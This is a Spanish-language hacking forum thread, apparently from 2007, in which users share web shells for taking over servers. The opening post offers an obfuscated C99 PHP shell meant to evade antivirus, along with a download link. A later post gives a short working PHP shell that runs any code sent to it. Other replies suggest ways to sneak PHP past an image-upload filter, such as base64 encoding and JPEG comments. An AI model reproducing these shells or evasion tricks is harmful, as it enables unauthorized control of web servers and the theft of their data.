Conseguí una verción del C99 shell cifrado en su totalidad para no ser descubierto por los antivirus.
Como dice un amigo: Enjoy!
Citar<? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
[...]
excede el limite y no se ve el código completo >:( lo subo y lo cuelgo... one moment...
------>Post modificado
Listo:
http://rapidshare.com/files/38464292/aAkjd5D-WHK.rar
Esta bueno... ;D ;D ;D
Mi PHP-Shell... ;D
<?php
echo "<br><form method=\"POST\"><center><textarea name=\"var\" cols=\"40\" rows=\"10\"></textarea>
<br><input type=\"submit\"></center></form><p>".
eval(str_replace( ord(166), "'", str_replace( ord(167), "\"", $_POST['var'])))."</p>";
?>
jeje, muy bueno. Una duda ¿la codificación es para burlar los A/V clientes o del server? no entiendo :xD
Otra, por ejemplo, tengo un server que opera con algún "mod" que cuando intentas subir una "imagen" (con código PHP, véase el tuto de codebreak) me tira error y una advertencia :xD ¿habrá alguna forma de saltarlo?
Saludos
Si dices el mensaje quizás podamos ayudarte...
Tal vez sea el de LFI???
el de los comentarios en el JPEG? ñ_ñ
Pos, podrias hacer lo mismo que hicieron con esta shell, usar la funcion eval()... (claro, tambien con base64_decode() ) ^^
El mensaje es simple "Se ha detectado código PHP en su imagen, no se ha podido subir y se ha reportado su ip xxx.xxx.xxx.xxx".
No Aziel, de hecho ya iba cifrado el código con Zend, ni idea como saltar ese filtro.
Saludos
disculpen mi ignoracia, pero la verdad no entiendo de q se trata :-[
baje el .rar y no comprendo para q sirve
Cita de: fitu en 23 Junio 2007, 07:11 AM
disculpen mi ignoracia, pero la verdad no entiendo de q se trata :-[
baje el .rar y no comprendo para q sirve
entonces para que lo bajas?
... no comprendia bien de q estaban hablando, pero por no ser comodo, baje el rar para ver si le encontraba la vuelta sin molestarlos...
al ver q no lograba entender tampoco el .rar no queria quedarme con la duda y solo por curiosidad pregunte...
si te parece q esta mal disculpame, pero mi intension solo era entender de q estaban hablando...
saludos
Es un software compilado en PHP.. la gracia es que puedes ejecutar cosas mirandola desde una pagina web.
si logras subir ese C99 en algún servidor puedes controlarlo en algunos casos con tan solo visitarlo.
Si quieres ver como funciona hazte una cuenta en iespana y subelo y despues mira como se ve y para que funciona.
Manuales hay por montones a estas alturas... yo iba a hacer uno pero nunca tube tiempo de terminarla ya que no tan solo deve incluir el como usarla, sino el como subirla, que hacer despues, etc etc... entiendes un poco mejor?
Si, gracias ahora si entiendo de q se trata :D
ahora me voy a crear una cuenta en iespana y pruebo...
gracias por contestar man
Cita de: fitu en 24 Junio 2007, 06:49 AM
... no comprendia bien de q estaban hablando, pero por no ser comodo, baje el rar para ver si le encontraba la vuelta sin molestarlos...
al ver q no lograba entender tampoco el .rar no queria quedarme con la duda y solo por curiosidad pregunte...
si te parece q esta mal disculpame, pero mi intension solo era entender de q estaban hablando...
saludos
okok, es que muchas veces hay skiddies por aqui que solo quieren descargar hacer 2 clicks y creerse dioses del hacking, por eso te lo preguntaba.
Cita de: Deka_10 en 25 Junio 2007, 00:39 AM
Cita de: fitu en 24 Junio 2007, 06:49 AM
... no comprendia bien de q estaban hablando, pero por no ser comodo, baje el rar para ver si le encontraba la vuelta sin molestarlos...
al ver q no lograba entender tampoco el .rar no queria quedarme con la duda y solo por curiosidad pregunte...
si te parece q esta mal disculpame, pero mi intension solo era entender de q estaban hablando...
saludos
okok, es que muchas veces hay skiddies por aqui que solo quieren descargar hacer 2 clicks y creerse dioses del hacking, por eso te lo preguntaba.
Si o sea como tú..
Es interezante ver como muchos nacieron aprendidos...........
Asi como a nadie le importa que hay gente que llega y quiere aprender, que no entiende y no hay algun ser gentil que tenga la bondad de dar una guia sino mas bien hace uso de su ego para demostar su aparente superioridad, olvidando que alguna vez fue un principiante y que a duras penas sabia navegar en internet.
Ahi les dejo para que lo piensen.......
El cielo esta aun muy lejano para ser tocado.
Cita de: Ing_Amc en 23 Junio 2007, 07:00 AM
El mensaje es simple "Se ha detectado código PHP en su imagen, no se ha podido subir y se ha reportado su ip xxx.xxx.xxx.xxx".
No Aziel, de hecho ya iba cifrado el código con Zend, ni idea como saltar ese filtro.
Saludos
Tal vez la web detecte los caracteres "<?" y "?>", xq no dices q web es para q podamos ayudarte?